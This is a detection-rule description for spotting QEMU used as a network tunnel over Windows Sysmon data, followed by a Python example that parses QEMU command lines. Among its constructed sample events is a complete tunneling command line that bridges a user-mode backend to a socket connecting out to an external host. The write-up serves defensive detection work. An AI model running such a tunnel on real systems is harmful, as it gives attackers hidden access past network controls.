
Summary
This detection rule identifies potential network tunneling through QEMU, an open-source machine emulator that runs guest operating systems as ordinary host processes. The rule targets command-line executions of QEMU whose arguments indicate that the emulator is being used to relay traffic rather than to run a workload. Based on an analysis of intrusion activity documented by SecureList, attackers can start QEMU with a minimal guest and a network configuration that bridges a host-facing user-mode network backend to a socket backend connected to an external server, creating a tunnel into the victim network that bypasses perimeter controls and hides the attacker's communications inside an ordinary-looking process. The logic is implemented in Splunk over Windows Sysmon data: it selects process-creation events (such as Sysmon Event ID 1), matches QEMU executables, and filters for the command-line arguments associated with this tunneling setup. The search returns the processes and users involved, giving analysts a starting point for triaging unauthorized network behavior originating from QEMU. Because legitimate virtualization also passes network arguments to QEMU, analysts should tune the rule on the combination of indicators (an outbound socket backend together with a user backend and hub bridging), on QEMU binaries running from unusual paths, and on accounts that have no business running a hypervisor.
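The following is an added example, not the rule's own SPL, that applies the same detection idea in Python to a handful of constructed Sysmon process-creation records. It assumes the tunneling indicators described above (a `socket` netdev with `connect=`, a `user` netdev with `restrict=off`, and `hubport` bridging); these are assumptions about the rule's logic, not quoted from it.

```python
"""Flag QEMU command lines that look like a user-mode network tunnel.

Added example: the indicator set below is assumed from the tunneling pattern
discussed on the page, not copied from the Splunk rule itself.
"""
import re

# Constructed sample Sysmon Event ID 1 records (not real telemetry).
SAMPLE_EVENTS = [
    {   # tiny guest, no disk, user backend bridged to an outbound socket
        "EventID": 1,
        "Image": r"C:\Windows\Temp\qemu-system-i386.exe",
        "User": r"CORP\svc_backup",
        "CommandLine": (
            "qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off "
            "-netdev socket,id=sock,connect=203.0.113.10:443 "
            "-netdev hubport,id=port-lan,hubid=0,netdev=lan "
            "-netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic"
        ),
    },
    {   # ordinary developer VM with a disk and a plain user-mode NIC
        "EventID": 1,
        "Image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",
        "User": r"CORP\dev1",
        "CommandLine": (
            "qemu-system-x86_64.exe -m 4096 -hda win10.qcow2 "
            "-netdev user,id=n1 -device e1000,netdev=n1"
        ),
    },
    {   # not QEMU at all
        "EventID": 1,
        "Image": r"C:\Windows\System32\cmd.exe",
        "User": r"CORP\dev1",
        "CommandLine": "cmd.exe /c whoami",
    },
    {   # wrong event type (network connection), must be ignored
        "EventID": 3,
        "Image": r"C:\Windows\Temp\qemu-system-i386.exe",
        "User": r"CORP\svc_backup",
        "CommandLine": "",
    },
]

NETDEV_RE = re.compile(r"-netdev\s+(\S+)")
DISK_ARGS = ("-hda", "-hdb", "-drive", "-cdrom")


def is_qemu(image: str) -> bool:
    """True when the executable's base name starts with 'qemu'."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name.startswith("qemu")


def parse_netdevs(cmdline: str) -> list:
    """Return [(backend, {option: value}), ...] for every -netdev argument."""
    devs = []
    for spec in NETDEV_RE.findall(cmdline):
        parts = spec.split(",")
        opts = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
        devs.append((parts[0], opts))
    return devs


def tunnel_indicators(cmdline: str) -> list:
    """Collect human-readable reasons a QEMU command line looks like a tunnel."""
    reasons = []
    devs = parse_netdevs(cmdline)
    backends = {backend for backend, _ in devs}
    for backend, opts in devs:
        if backend == "socket" and "connect" in opts:
            reasons.append(f"socket backend connects out to {opts['connect']}")
        if backend == "user" and opts.get("restrict") == "off":
            reasons.append("user backend with restrict=off (guest can reach host network)")
    if "hubport" in backends and "socket" in backends:
        reasons.append("hubport bridges a socket backend to another netdev")
    # Weak supporting signal: a VM with no disk has nothing to boot except a relay.
    if reasons and not any(arg in cmdline.split() for arg in DISK_ARGS):
        reasons.append("no disk image attached")
    return reasons


def detect(events: list) -> list:
    """Apply the indicator logic to process-creation events only."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1 or not is_qemu(ev.get("Image", "")):
            continue
        reasons = tunnel_indicators(ev.get("CommandLine", ""))
        if reasons:
            hits.append({"image": ev["Image"], "user": ev["User"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["user"], hit["image"])
        for reason in hit["reasons"]:
            print("  -", reason)
```

The developer VM in the sample set passes `-netdev` too but produces no reasons, which is the point of requiring the socket/hub combination rather than alerting on any network argument; the "no disk image" signal is only appended once a stronger indicator has already fired, so it sharpens a hit instead of generating one on its own.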
Categories
- Endpoint
- Windows
Data Sources
- Process
- Windows Registry
- Command
ATT&CK Techniques
- T1572 (Protocol Tunneling)
- T1095 (Non-Application Layer Protocol)
Created: 2024-02-09